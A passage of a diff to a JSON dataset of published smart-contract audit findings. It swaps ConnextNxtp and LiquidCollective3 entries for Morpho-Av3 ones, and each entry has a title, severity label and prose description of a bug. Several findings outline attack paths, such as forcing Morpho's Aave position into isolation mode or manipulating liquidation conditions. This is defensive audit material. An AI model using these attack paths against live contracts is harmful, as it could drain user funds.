(while an Aave user could have done it). Make a user liquidable (while an Aave user could have been healthy). Increasing the possibility to allow the liquidator to seize the full collateral of the borrower (instead of 50%). 9", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: High Risk MorphoInternal.sol#L324," ] }, { - "title": "Match filename to contract name", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Sometimes the name of the .sol file is different than the contract name. Also sometimes multiple contracts are defined in the same file. Additionally there are multiple .sol files with the same name. This makes it more difficult to find the file containing the contract. File: messaging/Merkle.sol contract MerkleTreeManager is ProposedOwnableUpgradeable { ... } File: messaging/libraries/Merkle.sol library MerkleLib { ... } File: ProposedOwnable.sol abstract contract ProposedOwnable is IProposedOwnable { ... } abstract contract ProposedOwnableUpgradeable is Initializable, ProposedOwnable { ... } File: OZERC20.sol 148 contract ERC20 is IERC20, IERC20Permit, EIP712 { ... }", + "title": "RewardsManager does not take in account users that have supplied collateral directly to the pool", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Inside RewardsManager._getUserAssetBalances Morpho is calculating the amount of the supplied and borrowed balance for a specific user. In the current implementation, Morpho is ignoring the amount that the user has supplied as collateral directly into the Aave pool. As a consequence, the user will be eligible for fewer rewards or even zero in the case where he/she has supplied only collateral.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: High Risk" ] }, { - "title": "Use uint40 for type in TypedMemView", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "All internal functions in TypedMemView use uint40 for type except build(). Since internal functions can be called by inheriting contracts, it's better to provide a consistent interface.", + "title": "Accounting issue when repaying P2P fees while having a borrow delta", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "When repaying debt on Morpho, any potential borrow delta is matched first. Repaying the delta should involve both decreasing the scaledDelta as well as decreasing the scaledP2PAmount by the matched amount. [1] However, the scaledP2PAmount update is delayed until the end of the repay function. The following repayFee call then reads the un-updated market.deltas.borrow.scaledP2PAmount storage variable leading to a larger estimation of the P2P fees that can be repaid. The excess fee that is repaid will stay in the contract and not be accounted for, when it should have been used to promote borrowers, increase idle supply or demote suppliers. For example, there could now be P2P suppliers that should have been demoted but are not and in reality don't have any P2P counterparty, leaving the entire accounting system in a broken state. Example (all values are in underlying amounts for brevity.) Imagine a borrow delta of 1000, borrow.scaledP2PTotal = 10,000 supply.scaledP2PTotal = 8,000, so the repayable fee should be (10,000 - 1000) - (8,000 - 0) = 1,000. Now a P2P borrower wants to repay 3000 debt: 1. Pool repay: no pool repay as they have no pool borrow balance. 2. Decrease p2p borrow delta: decreaseDelta is called which sets market.deltas.borrow.scaledDelta = 0 (but does not update market.deltas.borrow.scaledP2PAmount yet!) and returns matchedBorrowDelta = 1000 3. repayFee is called and it computes (10,000 - 0) - (8,000 - 1,000) = 2,000. They repay more than the actual fee.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: High Risk" ] }, { - "title": "Comment in function typeOf() is inaccurate", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "A comment in function typeOf() is inaccurate. It says it is shifting 24 bytes, however it is shifting 216 / 8 = 27 bytes. function typeOf(bytes29 memView) internal pure returns (uint40 _type) { assembly { ... // 216 == 256 - 40 _type := shr(216, memView) // shift out lower 24 bytes } }", + "title": "Repaying with ETH does not refund excess", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Users can repay WETH Morpho positions with ETH using the WETHGateway. The specified repay amount will be wrapped to WETH before calling the Morpho function to repay the WETH debt. However, the Morpho repay function only pulls in Math.min(_getUserBorrowBalanceFromIndexes(underlying, onBehalf, indexes), amount). If the user specified an amount larger than their debt balance, the excess will be stuck in the WETHGateway contract. This might be especially confusing for users because the standard Morpho.repay function does not have this issue and they might be used to specifying a large, round value to be sure to repay all principal and accrued debt once the transaction is mined.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: High Risk" ] }, { - "title": "Missing Natspec documentation in TypedMemView", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "unsafeJoin()'s Natspec documentation is incomplete as the second argument to function is not documented.", + "title": "Morpho can end up in isolation mode", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Aave-v3 introduced isolation assets and isolation mode for users: \"Borrowers supplying an isolated asset as collateral cannot supply other assets as collateral (though they can still supply to capture yield). Only stablecoins that have been permitted by Aave governance to be borrowable in isolation the mode can be borrowed by users utilizing isolated collateral up to a specified debt ceiling.\" The Morpho contract has a single Aave position for all its users and does therefore not want to end up in isolation mode due to its restrictions. The Morpho code would still treat the supplied non-isolation assets as collateral for their Morpho users, allowing them to borrow against them, but the Aave position does not treat them as collateral anymore. Furthermore, Morpho can only borrow stablecoins up to a certain debt ceiling. Morpho can be brought into isolation mode: Up to deployment, an attacker maliciously sends an isolated asset to the address of the proxy. Aave sets assets as collateral when transferred, such that the Morpho contract already starts out in isolation mode. This can even happen before deployment by precomputing addresses or simply frontrunning the deployment. This attack also works if Morpho does not intend to create a market for the isolated asset. Upon deployment and market creation: An attacker or unknowing user is the first to supply an asset and this asset is an isolated asset, Morpho's Aave position automatically enters isolation mode. At any time if an isolated asset is the only collateral asset. This can happen when collateral assets are turned off on Aave, for example, by withdrawing (or liquidating) the entire balance.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: High Risk" ] }, { - "title": "Remove irrelevant comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": " Instance 1 - TypedMemView.sol#L770 clone() has this comment that seems to be copied from equal(). This is not applicable to clone() and can be deleted. * @dev Shortcuts if the pointers are identical, otherwise compares type and digest. Instance 2 - SpokeConnector.sol#L499 The function process of SpokeConnector contains comments that are no longer relevant. // check re-entrancy guard // require(entered == 1, \"!reentrant\"); // entered = 0; Instance 3 - BridgeFacet.sol#L419 Nomad is no longer used within Connext. However, they are still being mentioned in the comments within the codebase. * @notice Initiates a cross-chain transfer of funds, calldata, and/or various named properties using ,! the nomad * network.", + "title": "Collateral setters for Morpho / Aave can end up in a deadlock", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "One can end up in a deadlock where changing the Aave pool or Morpho collateral state is not possible anymore because it can happen that Aave automatically turns the collateral asset off (for example, when withdrawing everything / getting liquidated). Imagine a collateral asset is turned on for both protocols: setAssetIsCollateralOnPool(true) setAssetIsCollateral(true) Then, a user withdraws everything on Morpho / Aave, and Aave automatically turns it off. It's off on Aave but on on Morpho. It can't be turned on for Aave anymore because: if (market.isCollateral) revert Errors.AssetIsCollateralOnMorpho(); But it also can't be turned off on Morpho anymore because of: if (!_pool.getUserConfiguration(address(this)).isUsingAsCollateral(_pool.getReserveData(underlying).id) ) { revert Errors.AssetNotCollateralOnPool(); ,! ,! } c This will be bad if new users deposit after having withdrawn the entire asset. The asset is collateral on Morpho but not on Aave, breaking an important invariant that could lead to liquidating the Morpho Aave position.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Medium Risk" ] }, { - "title": "Incorrect comment about TypedMemView encoding", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "A TypedMemView variable of type bytes29 is encoded as follows: First 5 bytes encode a type flag. Next 12 bytes point to a memory address. Next 12 bytes encode the length of the memory view (in bytes). Next 3 bytes are empty. When shifting a TypedMemView variable to the right by 15 bytes (120 bits), the encoded length and the empty bytes are removed. Hence, this comment is incorrect: // 120 bits = 12 bytes (the encoded loc) + 3 bytes (empty low space) _loc := and(shr(120, memView), _mask)", + "title": "First reward claim is zero for newly listed reward tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "When Aave adds a new reward token for an asset, the reward index for this (asset, reward) pair starts at 0. When an update in Morpho's reward manager occurs, it initializes all rewards for the asset and would initialize this new reward token with a startingIndex of 0. 1. Time passes and emissions accumulate to all pool users, resulting in a new index assetIndex. Users who deposited on the pool through Morpho before this reward token was listed should receive their fair share of the entire emission rewards (assetIndex - 0) * oldBalance but they currently receive zero because getRewards returns early if the user's computed index is 0. 2. Also note that the external getUserAssetIndex(address user, address asset, address reward) can be inaccurate because it doesn't simulate setting the startingIndex for reward tokens that haven't been set yet. 3. A smaller issue that can happen when new reward tokens are added is that updates to the startingIndex are late, the startingIndex isn't initialized to 0 but to some asset index that accrued emissions for some time. Morpho on-pool users would lose some rewards until the first update to the asset. (They should accrue from index 0 but accrue from startingIndex.) Given frequent calls to the RewardManager that initializes all rewards for an asset, this difference should be negligible.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Medium Risk" ] }, { - "title": "Constants can be used in assembly blocks directly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Yul cannot read global variables, but that is not true for a constant variable as its value is embedded in the bytecode. Highlighted code above have the following pattern: uint256 _mask = LOW_12_MASK; // assembly can't use globals assembly { // solium-disable-previous-line no-inline-assembly _len := and(shr(24, memView), _mask) } Here, LOW_12_MASK is a constant which can be used directly in assembly code.", + "title": "Disable creating markets for siloed assets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Aave-v3 introduced siloed-borrow assets and siloed-borrow mode for users \"This feature allow assets with potentially manipulatable oracles (for example illiquid Uni V3 pairs) to be listed on Aave as single borrow asset i.e. if user borrows siloed asset, they cannot borrow any other asset. This helps mitigating the risk associated with such assets from impacting the overall solvency of the protocol.\" - Aave Docs The Morpho contract should not be in siloed-borrowing mode to avoid its restrictions on borrowing any other listed assets, especially as borrowing on the pool might be required for withdrawals. If a market for the siloed asset is created at deployment, users might borrow the siloed asset and break borrowing any of the other assets.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Medium Risk" ] }, { - "title": "Document source of processMessageFromRoot()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function processMessageFromRoot() of ArbitrumHubConnector doesn't contain a comment where it is derived from. Most other functions have a link to the source. Linking to the source would make the function easier to verify and maintain.", + "title": "A high value of _defaultIterations could make the withdrawal and repay operations revert because of OOG", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "When the user executes some actions, he/she can specify their own maxIterations parameter. The user maxIterations parameter is directly used in supplyLogic and borrowLogic. In the withdrawLogic Morpho is recalculating the maxIterations to be used internally as Math.max(_default- Iterations.withdraw, maxIterations) and in repayLogic is directly using _defaultIterations.repay as the max number of iterations. This parameter is used as the maximum number of iterations that the matching engine can do to match suppli- ers/borrowers during promotion/demotion operations. 15 function _promoteOrDemote( LogarithmicBuckets.Buckets storage poolBuckets, LogarithmicBuckets.Buckets storage p2pBuckets, Types.MatchingEngineVars memory vars ) internal returns (uint256 processed, uint256 iterationsDone) { if (vars.maxIterations == 0) return (0, 0); uint256 remaining = vars.amount; // matching engine code... for (; iterationsDone < vars.maxIterations && remaining != 0; ++iterationsDone) { // matching engine code (onPool, inP2P, remaining) = vars.step(...); // matching engine code... } // matching engine code... } As you can see, the iteration keeps going on until the matching engine has matched enough balance or the iterations have reached the maximum number of iterations. If the matching engine cannot match enough balance, it could revert because of OOG if vars.maxIterations is a high value. For the supply or borrow operations, the user is responsible for the specified number of iterations that might be done during the matching process, in that case, if the operations revert because of OGG, it's not an issue per se. The problem arises for withdraw and replay operations where Morpho is forcing the number of operations and could make all those transactions always revert in case the matching engine does not match enough balance in time. Keep in mind that even if the transaction does not revert during the _promoteOrDemote logic, it could revert during the following operations just because the _promoteOrDemote has consumed enough gas to make the following operations to use the remaining gas.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Medium Risk" ] }, { - "title": "Be aware of zombies", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function _validateSendRoot() of ArbitrumHubConnector check that stakerCount and child- StakerCount are larger than 0. The definition of stakerCount and childStakerCount document that they could include zombies. Its not immediately clear what zombies are, but it might be relevant to consider them. contract ArbitrumHubConnector is HubConnector { function _validateSendRoot(...) ... { ... require(node.stakerCount > 0 && node.childStakerCount > 0, \"!staked\"); } } // Number of stakers staked on this node. This includes real stakers and zombies uint64 stakerCount; // Number of stakers staked on a child node. This includes real stakers and zombies uint64 childStakerCount;", + "title": "Morpho should check that the _positionsManager used has the same _E_MODE_CATEGORY_ID and _- ADDRESSES_PROVIDER values used by the Morpho contract itself", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Because _E_MODE_CATEGORY_ID and _ADDRESSES_PROVIDER are immutable variables and because Morpho is calling the PositionsManager in a delegatecall context, it's fundamental that both Morpho and Posi- tionsManager have been initialized with the same _E_MODE_CATEGORY_ID and _ADDRESSES_PROVIDER values. Morpho should also check the value of the PositionsManager._E_MODE_CATEGORY_ID and PositionsManager._- ADDRESSES_PROVIDER in both the setPositionsManager and initialize function.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Medium Risk" ] }, { - "title": "Readability of proveAndProcess()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function proveAndProcess() is relatively difficult to understand because it first processes for the case of i==0 and then does a loop over i==1..._proofs.length. function proveAndProcess(...) ... { ... bytes32 _messageHash = keccak256(_proofs[0].message); bytes32 _messageRoot = calculateMessageRoot(_messageHash, _proofs[0].path, _proofs[0].index); proveMessageRoot(_messageRoot, _aggregateRoot, _aggregatePath, _aggregateIndex); messages[_messageHash] = MessageStatus.Proven; for (uint32 i = 1; i < _proofs.length; ) { _messageHash = keccak256(_proofs[i].message); bytes32 _calculatedRoot = calculateMessageRoot(_messageHash, _proofs[i].path, _proofs[i].index); require(_calculatedRoot == _messageRoot, \"!sharedRoot\"); messages[_messageHash] = MessageStatus.Proven; unchecked { ++i; } } ... }", + "title": "In _authorizeLiquidate, when healthFactor is equal to Constants.DEFAULT_LIQUIDATION_THRESHOLD Morpho is wrongly setting close factor to DEFAULT_CLOSE_FACTOR", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "When the borrower's healthFactor is equal to Constants.MIN_LIQUIDATION_THRESHOLD Morpho is returning the wrong value for the closeFactor allowing only liquidate 50% of the collateral instead of the whole amount. When the healthFactor is lower or equal to the Constants.MIN_LIQUIDATION_THRESHOLD Morpho should return Constants.MAX_CLOSE_FACTOR following the same logic applied by Aave. Note that the user cannot be liquidated even if healthFactor == MIN_LIQUIDATION_THRESHOLD if the priceOr- acleSentinel is set and IPriceOracleSentinel(params.priceOracleSentinel).isLiquidationAllowed() == false. See how Aave performs the check inside validateLiquidationCall.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Medium Risk" ] }, { - "title": "Readability of checker()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function checker() is relatively difficult to read due to the else if chaining of if statements. As the if statements call return(), the else isn't necessary and the code can be made more readable. function checker() external view override returns (bool canExec, bytes memory execPayload) { bytes32 outboundRoot = CONNECTOR.outboundRoot(); if ((lastExecuted + EXECUTION_INTERVAL) > block.timestamp) { return (false, bytes(\"EXECUTION_INTERVAL seconds are not passed yet\")); } else if (lastRootSent == outboundRoot) { return (false, bytes(\"Sent root is the same as the current root\")); } else { execPayload = abi.encodeWithSelector(this.sendMessage.selector, outboundRoot); return (true, execPayload); } }", + "title": "_authorizeBorrow does not check if the Aave price oracle sentinel allows the borrowing operation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Inside the Aave validation logic for the borrow operation, there's an additional check that prevents the user from performing the operation if it has been not allowed inside the priceOracleSentinel require( params.priceOracleSentinel == address(0) || IPriceOracleSentinel(params.priceOracleSentinel).isBorrowAllowed(), Errors.PRICE_ORACLE_SENTINEL_CHECK_FAILED ); 17 Morpho should implement the same check. If for any reason the borrow operation has been disabled on Aave, it should also be disabled on Morpho itself. While the transaction would fail in case Morpho's user would need to perform the borrow on the pool, there could be cases where the user is completely matched in P2P. In those cases, the user would have performed a borrow even if the borrow operation was not allowed on the underlying Aave pool.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Medium Risk" ] }, { - "title": "Use function addressToBytes32", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function dispatch() of SpokeConnector contains an explicit conversion from address to bytes32. There is also a function addressToBytes32() that does the same and is more readable. function dispatch(...) ... { bytes memory _message = Message.formatMessage( ... bytes32(uint256(uint160(msg.sender))), ... );", + "title": "_updateInDS does not \"bubble up\" the updated values of onPool and inP2P", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The _updateInDS function takes as input uint256 onPool and uint256 inP2P that are passed not as reference, but as pure values. function _updateInDS( address poolToken, address user, LogarithmicBuckets.Buckets storage poolBuckets, LogarithmicBuckets.Buckets storage p2pBuckets, uint256 onPool, uint256 inP2P, bool demoting ) internal { if (onPool <= Constants.DUST_THRESHOLD) onPool = 0; if (inP2P <= Constants.DUST_THRESHOLD) inP2P = 0; // ... other logic of the function } Those values, if lower or equal to Constants.DUST_THRESHOLD will be set to 0. The issue is that the updated version of onPool and inP2P is never bubbled up to the original caller that will later use those values that could have been changed by the _updateInDS logic. For example, the _updateBorrowerInDS function call _updateInDS and relies on the value of onPool and inP2P to understand if the user should be removed or added to the list of borrowers. function _updateBorrowerInDS(address underlying, address user, uint256 onPool, uint256 inP2P, bool ,! demoting) internal { _updateInDS( _market[underlying].variableDebtToken, user, _marketBalances[underlying].poolBorrowers, _marketBalances[underlying].p2pBorrowers, onPool, inP2P, demoting ); if (onPool == 0 && inP2P == 0) _userBorrows[user].remove(underlying); else _userBorrows[user].add(underlying); } 18 Let's assume that inP2P and onPool passed as _updateBorrowerInDS inputs were equal to 1 (the value of DUST_- THRESHOLD). In this case, _updateInDS would update those values to zero because 1 <= DUST_THRESHOLD and would remove the user from both the poolBucket and p2pBuckets of the underlying. When then the function returns in the _updateBorrowerInDS context, the same user would not remove the under- lying from his/her _userBorrows list of assets because the updated values of onPool and inP2P have not been bubbled up by the _updateInDS function. The same conclusion could be made for all the \"root\" level codes that rely on the onPool and inP2P values that could not have been updated with the new 0 value set by _updateInDS.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Low Risk" ] }, { - "title": "_pickNextValidatorsToExitFromActiveOperators uses the wrong index to query stopped validator count for operators", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "operators does not necessarily have the same order as the actual OperatorsV2's operators, since the ones that don't have _hasExitableKeys will be skipped (the operator might not be active or all of its funded keys might have been requested to exit). And so when querying the stopped validator counts for (uint256 idx = 0; idx < exitableOperatorCount;) { uint32 currentRequestedExits = operators[idx].requestedExits; uint32 currentStoppedCount = _getStoppedValidatorsCountFromRawArray(stoppedValidators, idx); one should not use the idx in the cached operator's array, but the cached index of this array element, as the indexes of stoppedValidators correspond to the actual stored operator's array in storage. Note that when emitting the UpdatedRequestedValidatorExitsUponStopped event, the correct index has been used.", + "title": "There is no guarantee that the _rewardsManager is set when calling claimRewards", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Since the _rewardsManager address is set using a setter function in Morpho only and not in the MorphoStorage.sol constructor there is no guarantee that the _rewardsManager is not the default address(0) value. This could cause failures when calling claimRewards if Morpho forgets to set the _rewardsManager.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Critical Risk" + "Morpho-Av3", + "Severity: Low Risk" ] }, { - "title": "Oracles' reports votes are not stored in storage", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The purpose of Oracle.1.sol is to facilitate the reporting and quorum of oracles. Oracles period- ically add their reports and when consensus is reached the setConsensusLayerData function (which is a critical component of the system) is called. However, there is an issue with the current implementation as ReportVari- ants holds the reports made by oracles but ReportVariants.get() returns a memory array instead of a storage array, therefore resulting in an increase in votes that will not be stored at the end of the transaction and prevent- ing setConsensusLayerData from being called. This is a regression bug that should have been detected by a comprehensive test suite.", + "title": "Its Impossible to set _isClaimRewardsPaused", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The claimRewards function checks the isClaimRewardsPaused boolean value and reverts if it is true. Currently, there is no setter function in the code base that sets the _isClaimRewardsPaused boolean so it is impossible to change.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Critical Risk" + "Morpho-Av3", + "Severity: Low Risk" ] }, { - "title": "User's LsETH might be locked due to out-of-gas error during recursive calls", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Let W0, W1, ...W7 represent the withdrawal events in the withdrawal stack. Let R0, R1, R2 represent the users' redeem requests in the redeem queue. Assume that Alice is the owner of R1. When Alice called the resolveRedeemRequests function against R1, it will resolve to W 1. Next, Alice called the _claimRedeemRequest function with R1 and its corresponding W 1. The _claimRedeemRequest will first process W 1. At the end of the function, it will check if W 1 matches all the amounts of R1. If not, it will call the _claimRedeemRequest function recursively with the same request id (R1) but increment the withdrawal event id (W2 = W1 + 1). The _claimRedeemRequest function recursively calls itself until all the amount of redeem request is \"expended\" or the next withdrawal event does not exist. In the above example, the _claimRedeemRequest will be called 7 times with W1...W7, until all the amount of R1 is \"expended\" (R1.amount == 0) However, if the amount of a redeem request is large (e.g. 1000 LsETH), and this redeem request is satisfied by many small chunks of withdrawal events (e.g. one withdrawal event consists of less than 10 LsETH), then the recursion depth will be large. The function will keep calling itself recursively until an out-of-gas error happens. If this happens, there is no way to claim the redemption request, and the user's LsETH will be locked. In the current implementation, users cannot break the claim into smaller chunks to overcome the gas limit. In the above example, if Alice attempts to break the claim into smaller chunks by first calling the _claimRedeemRequest function with R1 and its corresponding W5, the _isMatch function within it will revert.", + "title": "User rewards can be claimed to treasury by DAO", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "When a user claims rewards, the rewards for the entire Morpho contract position on Aave are claimed. The excess rewards remain in the Morpho contract for until all users claimed their rewards. These rewards are not tracked and can be withdrawn by the DAO through a claimToTreasury call.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: High Risk" + "Morpho-Av3", + "Severity: Low Risk" ] }, { - "title": "Allowed users can directly transfer their share to RedeemManager", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "An allowed user can directly transfer its shares to the RedeemManager without requesting a redeem. This would cause the withdrawal stack to grow, since the redeem demand (2) which is calculated based on the RedeemManager's share of LsETH increases. RedeemQueue would be untouched in this case. In case of an accidental mistake by a user, the locked shares can only be retrieved by a protocol update.", + "title": "decreaseDelta lib function should return early if amount == 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The passed in amount should be checked for a zero value, and in that condition, return early from the function. The way it currently is unnecessarily consumes more gas, and emits change events that for values that don't end up changing (newScaledDelta). Checking for amount == 0 is already being done in the increaseDelta function.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Medium Risk" + "Morpho-Av3", + "Severity: Gas Optimization" ] }, { - "title": "Invariants are not enforced for stopped validator counts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "_setStoppedValidatorCounts does not enforce the following invariants: stoppedValidatorCounts[0] <= DepositedValidatorCount.get() stoppedValidatorCounts[i] needs to be a non-decreasing function when viewed on a timeline stoppedValidatorCounts[i] needs to be less than or equal to the funded number of validators for the corresponding operator. Currently, the oracle members can report values that would break these invariants. As a consequence, the oracle members can signal the operators to exit more or fewer validators by manipulating the preExitingBalance value. And activeCount for exiting validators picking algorithm can also be manipulated per operator.", + "title": "Smaller gas optimizations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "There are several small expressions that can be further gas optimized.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Medium Risk" + "Morpho-Av3", + "Severity: Gas Optimization" ] }, { - "title": "Potential out of gas exceptions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The purpose of _requestExitsBasedOnRedeemDemandAfterRebalancings is to release liquidity for withdrawals made in the RedeemManager contract. The function prioritizes liquidity sources, starting with Balance- ToRedeem and then BalanceToDeposit, before asking validators to exit. However, if the validators are needed to release more liquidity, the function uses pickNextValidatorsToExit to determine which validators to ask to exit. This process can be quite gas-intensive, especially if the number of validators is large. The gas consumption of this function depends on several factors, including exitableOperatorCount, stoppedVal- idators.length, and the rate of decrease of _count. These factors may increase over time, and the msg.sender does not have control over them. The function includes two nested loops that contribute to the overall gas con- sumption, and this can be problematic for certain inputs. For example, if the operators array has no duplications and the difference between values is exactly 1, such as [n, n-1, n-2 ... n-k] where n can be any number and k is a large number equals exitableOperatorCount - 1 and _count is also large, the function can become extremely gas-intensive. The main consequence of such a potential issue is that the function may not release enough liquidity to the RedeemManager contract, resulting in partial fulfillment of redemption requests. Similarly, _pickNextValidatorsToDepositFromActiveOperators is also very gas intensive. If the number of de- sired validators and current operators (including fundable operators) are high enough, depositToConsensusLayer is no longer callable.", + "title": "Gas: Optimize LogarithmicBuckets.getMatch", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The getMatch function of the logarithmic bucket first checks for a bucket that is the next higher bucket If no higher bucket is found it searches for a bucket that is the than the bucket the provided value would be in. highest bucket that \"is in both bucketsMask and lowerMask.\" However, we already know that any bucket we can now find will be in lowerMask as lowerMask is the mask corresponding to all buckets less than or equal to value's bucket. Instead, we can just directly look for the highest bucket in bucketsMask.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Medium Risk" + "Morpho-Av3", + "Severity: Gas Optimization" ] }, { - "title": "The validator count to exit in _requestExitsBasedOnRedeemDemandAfterRebalancings assumes that the to-be selected validators are still active and have not been penalised.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The validatorCountToExit is calculated as follows uint256 validatorCountToExit = LibUint256.ceil( redeemManagerDemandInEth - (availableBalanceToRedeem + exitingBalance + preExitingBalance), DEPOSIT_SIZE ); This formula assumes that the to-be selected validators exit by the pickNextValidatorsToExit are: 1. Still active 2. Have not been queued to be exited and 3. Have not been penalized and their balance is at least MAX_EFFECTIVE_BALANCE", + "title": "Consider reverting the supplyCollateralLogic execution when amount.rayDivDown(poolSupplyIndex) is equal to zero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "In Aave, when an AToken/VariableDebtToken is minted or burned, the transaction will revert if the amount divided by the index is equal to zero. You can see the check in the implementation of _mintScaled and _burnScaled functions in the Aave codebase. Morpho, with PR 688, has decided to prevent supply to the pool in this scenario to avoid a revert of the operation. Before the PR, if the user had supplied an amount for which amount.rayDivDown(poolSupplyIndex) would be equal to zero, the operation would have reverted at the Aave level during the mint operation of the AToken. With the PR, the operation will proceed because the supply to the Aave pool is skipped (see PoolLib.supplyToPool). Allowing this scenario in this specific context for the supplyCollateralLogic function will bring the following side effects: The supplied user's amount will remain in Morpho's contract and will not be supplied to the Aave pool. The user's accounting system is not updated because collateralBalance is increased by amount.rayDivDown(poolSupplyIndex) which is equal to zero. 21 If the marketBalances.collateral[onBehalf] was equal to zero (the user has never supplied the underly- ing to Morpho) the underlying token would be wrongly added to the _userCollaterals[onBehalf] storage, even if the amount supplied to Morpho (and to Aave) is equal to zero. The user will not be able to withdraw the provided amount because the amount has not been accounted for in the storage. Events.CollateralSupplied event is emitted even if the amount (used as an event parameter) has not been accounted to the user.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "Burn RedeemManager's share first before calling its reportWithdraw endpoint", - 